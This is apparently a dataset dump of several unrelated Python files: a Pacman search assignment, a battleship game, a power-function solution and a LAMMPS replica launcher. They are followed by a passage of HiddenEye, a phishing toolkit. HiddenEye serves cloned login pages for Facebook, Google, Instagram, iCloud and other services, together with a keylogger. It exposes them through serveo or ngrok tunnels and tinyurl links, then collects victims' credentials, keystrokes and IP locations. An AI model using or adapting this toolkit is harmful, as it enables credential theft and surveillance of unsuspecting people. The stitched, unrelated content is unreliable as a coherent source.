# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html
"""
In search.py, you will implement generic search algorithms which are called
by Pacman agents (in searchAgents.py).
"""
import util
import heapq
class SearchProblem:
    """
    This class outlines the structure of a search problem, but doesn't implement
    any of the methods (in object-oriented terminology: an abstract class).
    You do not need to change anything in this class, ever.
    """
    def getStartState(self):
        """
        Returns the start state for the search problem
        """
        util.raiseNotDefined()
    def isGoalState(self, state):
        """
        state: Search state
        Returns True if and only if the state is a valid goal state
        """
        util.raiseNotDefined()
    def getSuccessors(self, state):
        """
        state: Search state
        For a given state, this should return a list of triples,
        (successor, action, stepCost), where 'successor' is a
        successor to the current state, 'action' is the action
        required to get there, and 'stepCost' is the incremental
        cost of expanding to that successor
        """
        util.raiseNotDefined()
    def getCostOfActions(self, actions):
        """
        actions: A list of actions to take
        This method returns the total cost of a particular sequence of actions. The sequence must
        be composed of legal moves
        """
        util.raiseNotDefined()
def tinyMazeSearch(problem):
    """Return the hard-coded move sequence that solves the tinyMaze layout.

    For any other maze this sequence is wrong — use a real search instead.
    """
    from game import Directions
    south, west = Directions.SOUTH, Directions.WEST
    return [south, south, west, south, west, west, south, west]
def depthFirstSearch(problem):
    """
    Search the deepest nodes in the search tree first [p 85].

    Returns a list of actions that reaches the goal, using graph search
    (each state is generated at most once).
    """
    start = problem.getStartState()
    # Fix: the original never goal-tested the start state, so a problem whose
    # start is already a goal fell through the loop and returned None.
    if problem.isGoalState(start):
        return []
    fringe = util.Stack()            # LIFO frontier of (state, actions-so-far)
    visited = [start]                # states already generated (dedup at push)
    fringe.push((start, []))
    while not fringe.isEmpty():
        state, actions = fringe.pop()
        for successor, direction, _cost in problem.getSuccessors(state):
            if successor not in visited:
                # Goal test at generation time, as in the original.
                if problem.isGoalState(successor):
                    return actions + [direction]
                fringe.push((successor, actions + [direction]))
                visited.append(successor)
    util.raiseNotDefined()
def breadthFirstSearch(problem):
    """
    Search the shallowest nodes in the search tree first.

    Returns a list of actions that reaches the goal, using graph search
    (each state is generated at most once).
    """
    start = problem.getStartState()
    # Fix: the original never goal-tested the start state, so a problem whose
    # start is already a goal fell through the loop and returned None.
    if problem.isGoalState(start):
        return []
    fringe = util.Queue()            # FIFO frontier of (state, actions-so-far)
    visited = [start]                # states already generated (dedup at push)
    fringe.push((start, []))
    while not fringe.isEmpty():
        state, actions = fringe.pop()
        for successor, direction, _cost in problem.getSuccessors(state):
            if successor not in visited:
                # Goal test at generation is safe for BFS: FIFO order means
                # the first goal generated is at minimal depth.
                if problem.isGoalState(successor):
                    return actions + [direction]
                fringe.push((successor, actions + [direction]))
                visited.append(successor)
    util.raiseNotDefined()
def uniformCostSearch(problem):
    "Search the node of least total cost first. "
    # Dijkstra-style graph search: the fringe is a priority queue keyed by
    # the cost of the action sequence leading to each state.
    #Update function to find node of least cost
    def update(fringe, item, priority):
        # Decrease-key emulation for util.PriorityQueue: if item's state is
        # already queued with a lower-or-equal priority, keep the old entry;
        # otherwise replace it (or push a fresh entry if absent).
        for index, (p, c, i) in enumerate(fringe.heap):
            if i[0] == item[0]:
                if p <= priority:
                    break
                del fringe.heap[index]
                fringe.heap.append((priority, c, item))
                heapq.heapify(fringe.heap)
                break
        else:
            fringe.push(item, priority)
    #Initialize variables
    fringe = util.PriorityQueue()
    #Creating visited list
    visited = []
    fringe.push((problem.getStartState(), []), 0)
    visited.append(problem.getStartState())
    #Popping node from fringe
    while fringe.isEmpty() == False:
        state, actions = fringe.pop()
        # Goal test at expansion time — required for cost-optimal answers.
        if problem.isGoalState(state):
            return actions
        #Adding current node to visited list
        if state not in visited:
            visited.append(state)
        #Getting successors and finding the one of least cost using update function
        for next in problem.getSuccessors(state):
            newstate = next[0]
            newdirection = next[1]
            if newstate not in visited:
                update(fringe, (newstate, actions + [newdirection]), problem.getCostOfActions(actions+[newdirection]))
    util.raiseNotDefined()
def nullHeuristic(state, problem=None):
    """Trivial heuristic: estimate zero cost from any state to the goal."""
    return 0
def aStarSearch(problem, heuristic=nullHeuristic):
    """Search the node that has the lowest combined cost and heuristic first.

    Graph A*: priority is g(n) + h(n). Returns the action list to a goal,
    or [] if the frontier empties without finding one (as the original did).
    """
    visited = []                     # states already expanded
    fringe = util.PriorityQueue()
    start = problem.getStartState()
    fringe.push((start, []), heuristic(start, problem))
    while not fringe.isEmpty():
        state, actions = fringe.pop()
        if problem.isGoalState(state):
            return actions
        # Fix: skip states that were already expanded. The original appended
        # to visited without this check, so duplicate fringe entries caused
        # the same state to be expanded repeatedly.
        if state in visited:
            continue
        visited.append(state)
        # Renamed loop variables: the original shadowed `state` and the
        # builtin `dir`.
        for successor, action, _stepCost in problem.getSuccessors(state):
            if successor not in visited:
                newactions = actions + [action]
                score = problem.getCostOfActions(newactions) + heuristic(successor, problem)
                fringe.push((successor, newactions), score)
    return []
# Abbreviations
# Short aliases so the Pacman front end can select an algorithm by name.
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch |
11,009 | e3dea107d03de7bdf72fc32963bae2a3bb0b3dc0 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 8 13:31:03 2020
@author: chris
"""
from random import randint
def hint(l, r, c, aArray):
    """Return a direction hint for a ship directly adjacent to guess (l, r, c).

    Checks the four in-plane neighbours (same level) for an "S" cell.
    Fix: the original indexed r-1 / c-1 without a lower-bound check, so on
    row/column 0 Python's negative indexing wrapped to the far edge of the
    board and produced false "(above)" / "(left)" hints.
    """
    try:
        rows = len(aArray[l])
        cols = len(aArray[l][0])
        if r > 0 and aArray[l][r - 1][c] == "S":
            return "(above)"
        if r + 1 < rows and aArray[l][r + 1][c] == "S":
            return "(below)"
        if c + 1 < cols and aArray[l][r][c + 1] == "S":
            return "(right)"
        if c > 0 and aArray[l][r][c - 1] == "S":
            return "(left)"
        return "No ships in radius"
    except IndexError:
        # Out-of-range guesses still degrade gracefully, as before.
        return "No ships in radius"
def coord():
    """Pick a random (level, row, column) coordinate on the 3x10x10 board."""
    r = randint(0, 9)
    c = randint(0, 9)
    lvl = randint(0, 2)
    return lvl, r, c
def collision(level,row,column,size,aArray,opt):
    # Collision test for a prospective ship of `size` cells at
    # (level, row, column) with orientation opt (0: walk along columns,
    # 1: walk along rows, 2: walk the down-right diagonal). Returns
    # (clear, level, row, column, opt); the start coordinates may have been
    # re-rolled so the ship fits on the 10x10 plane.
    #ensures ship will fit on plane
    column1=column
    while column+(size-1) > 9:
        column = randint(0,9)
        if column > 9:
            # defensive reset; randint(0, 9) never actually exceeds 9
            column = column1
    clear = True
    if opt == 0:
        # NOTE(review): range(size-1) inspects one cell fewer than the ship
        # occupies, so the ship's last cell is never collision-checked.
        for i in range(size-1):
            if aArray[level][row][column] == "S":
                clear = False
            else:
                column+=1
    if opt == 1:
        #ensures ship will fit on plane
        row1=row
        while row+(size-1) > 9:
            row = randint(0,9)
            if row > 9:
                row = row1
        for i in range(size-1):
            if aArray[level][row][column] == "S":
                clear = False
            else:
                row+=1
    if opt == 2:
        #ensures ship will fit on plane
        column1=column
        row1=row
        while column+(size-1) > 9 or row+(size-1) > 9:
            column = randint(0,9)
            row = randint(0,9)
            if column > 9 or row > 9:
                column = column1
                row = row1
        for i in range(size-1):
            if aArray[level][row][column] == "S":
                clear = False
            else:
                row+=1
                column+=1
    return clear, level, row, column, opt
def aRow(level, row, column, size, aArray):
    """Place a ship of `size` cells extending along increasing rows."""
    saved = row
    # Re-roll the start row until the ship fits within rows 0..9.
    while row + (size - 1) > 9:
        row = randint(0, 9)
        if row > 9:   # defensive; randint(0, 9) cannot exceed 9
            row = saved
    # Mark the ship cells.
    for _ in range(size):
        aArray[level][row][column] = "S"
        row += 1
    return aArray
def aColumn(level, row, column, size, aArray):
    """Place a ship of `size` cells extending along increasing columns."""
    saved = column
    # Re-roll the start column until the ship fits within columns 0..9.
    while column + (size - 1) > 9:
        column = randint(0, 9)
        if column > 9:   # defensive; randint(0, 9) cannot exceed 9
            column = saved
    # Mark the ship cells.
    for _ in range(size):
        aArray[level][row][column] = "S"
        column += 1
    return aArray
def aDiagnal(level, row, column, size, aArray):
    """Place a ship of `size` cells along the down-right diagonal."""
    saved_col, saved_row = column, row
    # Re-roll the start until the ship fits on both axes (0..9).
    while column + (size - 1) > 9 or row + (size - 1) > 9:
        column = randint(0, 9)
        row = randint(0, 9)
        if column > 9 or row > 9:   # defensive; randint stays within 0..9
            column = saved_col
            row = saved_row
    # Mark the ship cells, stepping one row and one column each time.
    for _ in range(size):
        aArray[level][row][column] = "S"
        column += 1
        row += 1
    return aArray
def createShip(level, row, column, size, pos, aArray):
    """Dispatch ship placement by orientation code.

    pos 0 -> aColumn, pos 1 -> aRow, pos 2 -> aDiagnal (mapping kept exactly
    as the original; note the original's VERTICAL/HORIZONTAL comments do not
    obviously match which axis each helper walks — confirm before renaming).
    Any other pos leaves the board untouched.
    """
    if pos == 0:
        return aColumn(level, row, column, size, aArray)
    if pos == 1:
        return aRow(level, row, column, size, aArray)
    if pos == 2:
        return aDiagnal(level, row, column, size, aArray)
    return aArray
def main():
    """Set up a 3-level 10x10 battleship board, place 5 random ships,
    then run the interactive guessing loop until all 17 ship cells
    ("S") are found.

    NOTE(review): the ``for guess in range(30)`` loop sits inside
    ``while run``, so after 30 misses the attempt counter resets rather
    than ending the game; user input is not validated, so out-of-range
    coordinates raise IndexError — confirm whether that is intended.
    """
    #creating array
    # aArray holds the real ship layout, bArray is what the player sees.
    aArray = [[["-" for j in range(10)]for j in range(10)]for j in range(3)]
    bArray = [[["-" for j in range(10)]for j in range(10)]for j in range(3)]
    #list of ship sizes
    sizes = [2,3,3,4,5]
    clear = False
    #creating 5 ships
    for size in sizes:
        # Retry random placements until one passes the collision check.
        while clear == False:
            #random coodinates
            level, row, column = coord()
            #randomly chooses position of ship
            pos = randint(0,2)
            #checks for collision
            clear, level, row, column, pos = collision(level, row, column, size, aArray, pos)
        #if test is passed ship is created
        aArray = createShip(level, row, column, size, pos, aArray)
        clear = False
    #Game starts
    print("██████╗░░█████╗░████████╗████████╗██╗░░░░░███████╗░██████╗██╗░░██╗██╗██████╗░")
    print("██╔══██╗██╔══██╗╚══██╔══╝╚══██╔══╝██║░░░░░██╔════╝██╔════╝██║░░██║██║██╔══██╗")
    print("██████╦╝███████║░░░██║░░░░░░██║░░░██║░░░░░█████╗░░╚█████╗░███████║██║██████╔╝")
    print("██╔══██╗██╔══██║░░░██║░░░░░░██║░░░██║░░░░░██╔══╝░░░╚═══██╗██╔══██║██║██╔═══╝░")
    print("██████╦╝██║░░██║░░░██║░░░░░░██║░░░███████╗███████╗██████╔╝██║░░██║██║██║░░░░░")
    print("╚═════╝░╚═╝░░╚═╝░░░╚═╝░░░░░░╚═╝░░░╚══════╝╚══════╝ ═════╝░╚═╝░░╚═╝╚═╝╚═╝░░░░░")
    print()
    run = True
    spots = 0
    while run:
        for guess in range(30):
            #printing array
            # Render the player's view (hits only) level by level.
            print()
            for i in range(3):
                print("Level",i)
                print("  0 1 2 3 4 5 6 7 8 9")
                for j in range(10):
                    print(j,end="")
                    for l in range(10):
                        print('|',end="")
                        print(bArray[i][j][l],end="")
                        if l == 9:
                            print("|")
                print()
            #User enters guess
            print("🅁🄴🄼🄰🄸🄽🄸🄽🄶 🄰🅃🅃🄴🄼🄿🅃🅂:", 30-guess)
            print("Spots found:",spots,"/17")
            print("Enter your guess")
            l=int(input("Level:"))
            r=int(input("Row:"))
            c=int(input("Column:"))
            if aArray[l][r][c] == "S":
                print()
                print("Spot found!")
                spots+=1
                bArray[l][r][c] = "S"
            else:
                print("Nothing found here, try again.")
                # hint() is defined earlier in the file (outside this view).
                print(hint(l,r,c,aArray))
            if spots == 17:
                run = False
# Start the game only when executed as a script (not on import).
if __name__ == "__main__":
    main()
|
11,010 | ea5a1ddf865ae8ef664019ecf3152656f112177a | class Solution:
def myPow(self, x: float, n: int) -> float:
if x == 1.0:
return 1.0
if n<0:
return 1/self.power(x, -n)
else:
return self.power(x, n)
def power(self, x: float, n: int) -> float:
if n==0:
return 1
v = self.power(x, n//2)
if n%2 == 0:
return v*v
else:
return v*v*x
|
11,011 | 4238a31d2eb045ac73c0f044799c6772e50ae147 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue May 28 09:24:03 2019
"Creates replicas of simulations starting from configurations during the equilibration"
It reads a template file and copies the files creating simulation instances
each one containing a copy of the template with the modifications indicated
in the example block of code or as in the example below
Here we modify the imput file, modifying one line with the pattern as given
by cf.modify_file
file_name = "input.lmp"
file_path = sim.folder+'/'+file_name
value_modify = sim.initial_conf.split('/')[-1]
cf.modify_file(file_path, 'read_restart', 'read_restart\t%s\n'%value_modify)
@author: sr802
"""
import glob
import sys
import os
import shutil
import argparse
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../')) #This falls into Utilities path
import Lammps.core_functions as cf
from Lammps.simulation_utilities import simulation_launcher
cwd = os.getcwd() #current working directory
dir_path = os.path.dirname(os.path.realpath(__file__))#Path of this python script
# =============================================================================
# Main
# =============================================================================
def main(name, root, template, conf_folder, n_conf, epsilon, identifier, run):
    """Create one simulation replica per restart configuration.

    Args:
        name: base name of the batch folder (suffixed with ``identifier``).
        root: directory in which the batch folder is created.
        template: directory copied as the template of every replica.
        conf_folder: directory holding the restart/configuration files.
        n_conf: number of configurations to use, counted from the last.
        epsilon: monomer-solute interaction written into in.interaction.
        identifier: numerical suffix distinguishing this batch.
        run: when True, each simulation is launched after being set up.
    """
    #Getting the path to all the restart files
    files = glob.glob('%s/*'%conf_folder)
    times = cf.extract_digits(files)
    # Keep only the trailing digit group of each file name (the timestep).
    times = [str(int(time[-1])) for time in times]
    #Takign the last N configurations
    conf_times = times[-n_conf:]
    home = root+'/'+name+'_%s'%identifier
    files_analysis = cf.parameter_finder(files,conf_times)
    # Start from a clean batch folder (ignore if it does not exist yet).
    shutil.rmtree(home,ignore_errors=True)
    for i in files_analysis:
# =============================================================================
#         The extraction of the parameters for the simulation comes here
# =============================================================================
        time = int(cf.extract_digits(files[i])[-1])
        # Each replica is named after its restart timestep.
        name = str(time)
        restart = files[i]
# =============================================================================
#         Creating the simulation instance
# =============================================================================
        sim = simulation_launcher(home, template, name, restart)
        sim.create_folder()
        print('\nworking on %s'%sim.name)
        # IF the template has qsub
        if sim.has_qsub == False:
            sim.create_qsub('short', 1, 16, 1, 'input.lmp')
        else:
            # Modifying as below
            # Rename the queue job after this replica.
            file_name = sim.qsub_file
            file_path = sim.folder+'/'+file_name
            value_modify = sim.name
            cf.modify_file(file_path, '#PBS -N', '#PBS -N %s\n'%value_modify)
# =============================================================================
#         #Mofications to the files here (THIS IS SPECIFIC)
# =============================================================================
        # Point the LAMMPS input at this replica's restart file.
        file_name = "input.lmp"
        file_path = sim.folder+'/'+file_name
        value_modify = sim.initial_conf.split('/')[-1]
        cf.modify_file(file_path, 'read_restart', 'read_restart\t%s\n'%value_modify)
        # Overwrite the 2-3 pair coefficient with the requested epsilon.
        file_name = "in.interaction"
        file_path = sim.folder+'/'+file_name
        value_modify = epsilon
        cf.modify_file(file_path,'2 3','pair_coeff\t2 3 %s 1.0\n'%value_modify)
# =============================================================================
#         Running the simulation
# =============================================================================
        if run == True:
            sim.run_simulation()
            # run_simulation changes directory; return to where we started.
            os.chdir(cwd)
if __name__ == "__main__":
    """
    THIS IS VERY SPECIFIC
    The arguments of this depend on the application
    """
    # Command-line interface: every flag maps 1:1 onto a main() parameter;
    # the defaults reproduce the author's local directory layout.
    parser = argparse.ArgumentParser(description='Launch simulations from restart',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('-name', metavar='name',help='Name of the folder to keep all the simulations',default='mu_force')
    parser.add_argument('-conf_folder', metavar='path_restart',help='Directory of the restart files',default='./Try/particle/')
    parser.add_argument('-template', metavar='path_template',help='Directory to take as template',default=cwd+'/Template')
    parser.add_argument('-root', metavar='root directory',help='Directory to create the folder for the simulations',default=cwd)
    parser.add_argument('-n_conf',metavar='n conf',help='number of configurations starting from the last',default=5,type=int)
    parser.add_argument('-epsilon',metavar='epsilon',help='monomer solute interaction',default=3.0,type=float)
    # NOTE(review): identifier is parsed as float but formatted with %s in
    # main(), yielding folder names like name_1.0 — confirm this is wanted.
    parser.add_argument('-identifier',metavar='force',help='Numerical identifier',default=1,type=float)
    parser.add_argument('-run',metavar='run',help='Define if run simulations or not. If not, just creates the folder structure',default=False,type=cf.str2bool)
    args = parser.parse_args()
    main(args.name, args.root, args.template, args.conf_folder, args.n_conf, args.epsilon,
         args.identifier, args.run)
|
11,012 | 53730827227b72991a83b20a31f12cba3198bf68 | #!/usr/bin/python3
#-*- coding: utf-8 -*-
# HiddenEye v1.0
# By:- DARKSEC TEAM
#
###########################
from time import sleep
from sys import stdout, exit, argv
from os import system, path
from distutils.dir_util import copy_tree
import multiprocessing
from urllib.request import urlopen, quote, unquote
from platform import system as systemos, architecture
from wget import download
import re
import json
from subprocess import check_output
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
def connected(host='http://duckduckgo.com'): #Checking network connection.
try:
urlopen(host)
return True
except:
return False
if connected() == False: #If there no network
print ('''{0}[{1}!{0}]{1} Network error. Verify your Internet connection.\n
'''.format(RED, DEFAULT))
exit(0)
def checkNgrok(): #Check if user already have Ngrok server, if False - downloading it.
if path.isfile('Server/ngrok') == False:
print('[*] Downloading Ngrok...')
if 'Android' in str(check_output(('uname', '-a'))):
filename = 'ngrok-stable-linux-arm.zip'
else:
ostype = systemos().lower()
if architecture()[0] == '64bit':
filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype)
else:
filename = 'ngrok-stable-{0}-386.zip'.format(ostype)
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
download(url)
system('unzip ' + filename)
system('mv ngrok Server/ngrok')
system('rm -Rf ' + filename)
system('clear')
checkNgrok()
def end(): #Message when HiddenEye exit
system('clear')
print ('''{1}THANK YOU FOR USING ! JOIN DARKSEC TEAM NOW (github.com/DarkSecDevelopers).{1}'''.format(RED, DEFAULT, CYAN))
print ('''{1}WAITING FOR YOUR CONTRIBUTION. GOOD BYE !.{1}'''.format(RED, DEFAULT, CYAN))
def loadModule(module):
print ('''{0}[{1}*{0}]{1} You Have Selected %s Module ! KEEP GOING !{0}'''.format(CYAN, DEFAULT) % module)
def runPhishing(page, option2): #Phishing pages selection menu
system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/')
if option2 == '1' and page == 'Facebook':
copy_tree("WebPages/fb_standard/", "Server/www/")
if option2 == '2' and page == 'Facebook':
copy_tree("WebPages/fb_advanced_poll/", "Server/www/")
if option2 == '3' and page == 'Facebook':
copy_tree("WebPages/fb_security_fake/", "Server/www/")
if option2 == '4' and page == 'Facebook':
copy_tree("WebPages/fb_messenger/", "Server/www/")
elif option2 == '1' and page == 'Google':
copy_tree("WebPages/google_standard/", "Server/www/")
elif option2 == '2' and page == 'Google':
copy_tree("WebPages/google_advanced_poll/", "Server/www/")
elif option2 == '3' and page == 'Google':
copy_tree("WebPages/google_advanced_web/", "Server/www/")
elif page == 'LinkedIn':
copy_tree("WebPages/linkedin/", "Server/www/")
elif page == 'GitHub':
copy_tree("WebPages/GitHub/", "Server/www/")
elif page == 'StackOverflow':
copy_tree("WebPages/stackoverflow/", "Server/www/")
elif page == 'WordPress':
copy_tree("WebPages/wordpress/", "Server/www/")
elif page == 'Twitter':
copy_tree("WebPages/twitter/", "Server/www/")
elif page == 'Snapchat':
copy_tree("WebPages/Snapchat_web/", "Server/www/")
elif page == 'Yahoo':
copy_tree("WebPages/yahoo_web/", "Server/www/")
elif page == 'Twitch':
copy_tree("WebPages/twitch/", "Server/www/")
elif page == 'Microsoft':
copy_tree("WebPages/live_web/", "Server/www/")
elif page == 'Steam':
copy_tree("WebPages/steam/", "Server/www/")
elif page == 'iCloud':
copy_tree("WebPages/iCloud/", "Server/www/")
elif option2 == '1' and page == 'Instagram':
copy_tree("WebPages/Instagram_web/", "Server/www/")
elif option2 == '2' and page == 'Instagram':
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
elif option2 == '1' and page == 'VK':
copy_tree("WebPages/VK/", "Server/www/")
elif option2 == '2' and page == 'VK':
copy_tree("WebPages/VK_poll_method/", "Server/www/")
didBackground = True
logFile = None
for arg in argv:
if arg=="--nolog": #If true - don't log
didBackground = False
if didBackground:
logFile = open("log.txt", "w")
def log(ctx): #Writing log
if didBackground: #if didBackground == True, write
logFile.write(ctx.replace(RED, "").replace(WHITE, "").replace(CYAN, "").replace(GREEN, "").replace(DEFAULT, "") + "\n")
print(ctx)
def waitCreds():
print("{0}[{1}*{0}]{1} Looks Like Everything is Ready. Now Feel The Power.".format(CYAN, DEFAULT))
print("{0}[{1}*{0}]{1} KEEP EYE ON HIDDEN WORLD WITH DARKSEC.".format(RED, DEFAULT))
print("{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n".format(CYAN, DEFAULT))
while True:
with open('Server/www/usernames.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
log('======================================================================'.format(RED, DEFAULT))
log(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
log('======================================================================'.format(RED, DEFAULT))
log(' {0}***** I KNOW YOU ARE ENJOYING. SO MAKE IT POPULAR TO GET MORE FEATURES *****{1}\n {0}{1}'.format(RED, DEFAULT))
creds.close()
with open('Server/www/ip.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
resp = urlopen('https://ipinfo.io/%s/json' % ip)
ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
log('======================================================================'.format(RED, DEFAULT))
log(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
else:
matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
latitude = matchObj.group(1)
longitude = matchObj.group(2)
log('======================================================================'.format(RED, DEFAULT))
log(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
log(' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, DEFAULT) % (longitude, latitude))
log(' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['org'], ipinfo['country']))
log(' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['region'], ipinfo['city']))
system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
log('======================================================================'.format(RED, DEFAULT))
creds.close()
with open('Server/www/KeyloggerData.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
log('______________________________________________________________________'.format(RED, DEFAULT))
log(' {0}[KEY PRESSED ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
system('rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt')
log('______________________________________________________________________'.format(RED, DEFAULT))
creds.close()
def runPEnv(): #menu where user select what they wanna use
system('clear')
print ('''
______________________________________________________________
------>{2} HIDDEN EYE {2}<-------
{0}KEEP EYE ON HIDDEN WORLD WITH DARKSEC.
{0}[ LIVE VICTIM ATTACK INFORMATION ]
{0}[ LIVE KEYSTROKES CAN BE CAPTURED ]
_______________________________________________________________
{1}'''.format(GREEN, DEFAULT, CYAN))
if 256 != system('which php'): #Checking if user have PHP
print (" -----------------------".format(CYAN, DEFAULT))
print ("[PHP INSTALLATION FOUND]".format(CYAN, DEFAULT))
print (" -----------------------".format(CYAN, DEFAULT))
else:
print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run HiddenEye again.http://www.php.net/".format(RED, DEFAULT))
exit(0)
for i in range(101):
sleep(0.05)
stdout.write("\r{0}[{1}*{0}]{1} Eye is Opening. Please Wait... %d%%".format(CYAN, DEFAULT) % i)
stdout.flush()
if input(" \n\n{0}[{1}!{0}]{1} DO YOU AGREE TO USE THIS TOOL FOR EDUCATIONAL PURPOSE ? (y/n)\n\n{2}[HIDDENEYE-DARKSEC]- > {1}".format(RED, DEFAULT, CYAN)).upper() != 'Y': #Question where user must accept education purposes
system('clear')
print ('\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n\n'.format(RED, DEFAULT))
exit(0)
option = input("\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
if option == '1':
loadModule('Facebook')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
runPhishing('Facebook', option2)
elif option == '2':
loadModule('Google')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
runPhishing('Google', option2)
elif option == '3':
loadModule('LinkedIn')
option2 = ''
runPhishing('LinkedIn', option2)
elif option == '4':
loadModule('GitHub')
option2 = ''
runPhishing('GitHub', option2)
elif option == '5':
loadModule('StackOverflow')
option2 = ''
runPhishing('StackOverflow', option2)
elif option == '6':
loadModule('WordPress')
option2 = ''
runPhishing('WordPress', option2)
elif option == '7':
loadModule('Twitter')
option2 = ''
runPhishing('Twitter', option2)
elif option == '8':
loadModule('Instagram')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
runPhishing('Instagram', option2)
elif option == '9':
loadModule('Snapchat')
option2 = ''
runPhishing('Snapchat', option2)
elif option == '10':
loadModule('Yahoo')
option2 = ''
runPhishing('Yahoo', option2)
elif option == '11':
loadModule('Twitch')
option2 = ''
runPhishing('Twitch', option2)
elif option == '12':
loadModule('Microsoft')
option2 = ''
runPhishing('Microsoft', option2)
elif option == '13':
loadModule('Steam')
option2 = ''
runPhishing('Steam', option2)
elif option == '14':
loadModule('VK')
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT))
runPhishing('VK', option2)
elif option == '15':
loadModule('iCloud')
option2 = ''
runPhishing('iCloud', option2)
else:
system('clear && ./HiddenEye.py')
def runServeo():
system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:1111 serveo.net > link.url 2> /dev/null &')
sleep(7)
with open('link.url') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
pass
else:
runServeo()
output = check_output("grep -o 'https://[0-9a-z]*\.serveo.net' link.url", shell=True)
url = str(output).strip("b ' \ n")
print("\n {0}[{1}*{0}]{1} SERVEO URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN))
link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, DEFAULT, GREEN) + link + "{1}".format(CYAN, DEFAULT, GREEN))
print("\n")
def runNgrok():
system('./Server/ngrok http 1111 > /dev/null &')
while True:
sleep(2)
system('curl -s -N http://127.0.0.1:4040/status | grep "https://[0-9a-z]*\.ngrok.io" -oh > ngrok.url')
urlFile = open('ngrok.url', 'r')
url = urlFile.read()
urlFile.close()
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(CYAN, DEFAULT, GREEN) + url + "{1}".format(CYAN, DEFAULT, GREEN))
link = check_output("curl -s 'http://tinyurl.com/api-create.php?url='"+url, shell=True).decode().replace('http', 'https')
